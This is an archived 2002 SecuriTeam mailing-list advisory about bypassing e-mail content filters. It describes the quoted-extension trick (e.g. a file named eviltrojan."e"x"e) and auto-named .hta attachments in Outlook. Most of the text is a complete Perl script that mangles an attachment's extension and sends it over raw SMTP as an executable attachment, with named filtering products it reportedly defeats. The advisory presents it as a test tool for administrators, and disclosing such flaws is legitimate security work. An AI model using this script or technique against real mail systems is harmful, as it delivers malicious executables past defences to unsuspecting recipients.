[EXPL] Bypassing Content Filtering Software (Exploit)
From: support@securiteam.comDate: 02/21/02
- Previous message: support@securiteam.com: "[UNIX] Slashcode Login Vulnerability (Patch Available)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Thu, 21 Feb 2002 06:22:59 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Bypassing Content Filtering Software (Exploit)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/securitynews/5DP0I206AY.html> Bypassing Content
Filtering Software, flaws in several e-mail filtering products allow
encoded emails that contain malicious attachments to bypass the filtering
engines. The following is an exploit code that can be used by
administrators to test their system for the mentioned vulnerabilities.
DETAILS
There are many ways you can get past mail filtering systems, because most
of them will not emulate the exact behavior of the e-mail clients,
especially if you have multiple clients. One of the most effective methods
against Outlook/Outlook express is to just name the file
eviltrojan."e"x"e
Outlook/OE will just take the quotes out of the filename before it's
executed.
Of course, most filtering systems will scan the file and recognize it as
an executable(PE) and disallow it (same goes for VBS/JS files etc, they
usually look for very common VB or JS code) but it is pretty obvious that
they do not recognize all executable content (Like .bat files?)
(Alternatively, encoded data as mentioned in the advisory).
One other thing, Outlook/OE will sometimes give an attachment that has no
name a name, depending on the content-type, mostly all non-dangerous
types. I.e. if you have a wav attachment, but it has no filename (in the
MIME headers) but it has a content-type: audio/x-wav it will name it
ATT00xxx.wav. This will work with .hta files if you don't name them and
give them content-type=application/hta
Exploit:
#!/usr/bin/perl
# attqt.pl 0.1 by Aidan O'Kelly July 2001
#Send banned attachments through SMTP gateways, this works because MS
Outlook removes illegal
#charachters in filenames. So when you put an illegal char (such as ") in
the extension. The Gateway will
#not recognize it as a dangerous attachment. But when the user on the
other end opens it the illegal
#char will be removed.
#
# Feedback welcome. aidan.ok@oceanfree.net
#
# This is known to work on MailMarshall and TrendMicro Scanmail. Others
have not been tested but most are
# probably vunreable. If it works on any others, please mail me and let me
know.
# This only puts in one quote after the dot (eg virus."vbs or virus."exe)
# Some gateways might still pick up on the vbs. you can put in more or
different
# charachters like virus.%v"b********s if you feel like it.
# $filename =~ s/\./\.\"/g; is the line that changes it.
use Getopt::Std;
use MIME::Base64 qw(encode_base64);
use IO::Socket::INET;
getopt('atfhsb');
if (!$opt_a || !$opt_f || !$opt_t || !$opt_h)
{
print "Usage: attqt.pl <-a attachment> <-t to> <-f from> <-h smtphost>
[-s subject] [-b text]\n";
exit;
}
open(FILE, $opt_a) or die "$!";
binmode FILE;
while (read(FILE, $buf, 60*57)) {
$attachment = $attachment . encode_base64($buf);
}
close(FILE);
$filename = $opt_a;
$filename =~ s/\./\.\"/g;
print "$filename\n";
$sock = IO::Socket::INET->new(PeerAddr => "$opt_h",PeerPort => '25', Proto
=> 'tcp');
unless (<$sock> =~ "220") { die "Not a SMTP Server?" }
print $sock "HELO you\r\n";
unless (<$sock> =~ "250") { die "HELO failed" }
print $sock "MAIL FROM:<>\r\n";
unless (<$sock> =~ "250") { die "MAIL FROM failed" }
print $sock "RCPT TO:<$opt_t>\r\n";
unless (<$sock> =~ "250") { die "RCPT TO failed" }
print $sock "DATA\r\n";
unless (<$sock> =~ "354") { die "DATA failed" }
print $sock "From: $opt_f\n";
print $sock "To: $opt_t\n";
print $sock "Subject: $opt_s\n";
print $sock "MIME-Version: 1.0
Content-Type: multipart/related;
type=\"multipart/alternative\";
boundary=\"NextPart19\"
This is a multi-part message in MIME format.
--NextPart19
Content-Type: multipart/alternative;
boundary=\"NextPart20\"
--NextPart20
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
--NextPart20
Content-Type: text/html;
charset=\"iso-8859-1\"
Content-Transfer-Encoding: quoted-printable
";
print $sock "$opt_b\n";
print $sock "--NextPart20--
--NextPart19
Content-Type: application/x-msdownload
Content-Disposition: attachment;filename=\"$filename\"
Content-Transfer-Encoding: base64\r\n\n";
print $sock $attachment;
print $sock "\r\n--NextPart19--\n.\n";
print "Finished sending data\n";
$a = <$sock>;
print "$a\n";
close($sock);
ADDITIONAL INFORMATION
The information has been provided by <mailto:aidanokelly@oceanfree.net>
Aidan O'Kelly.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Slashcode Login Vulnerability (Patch Available)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
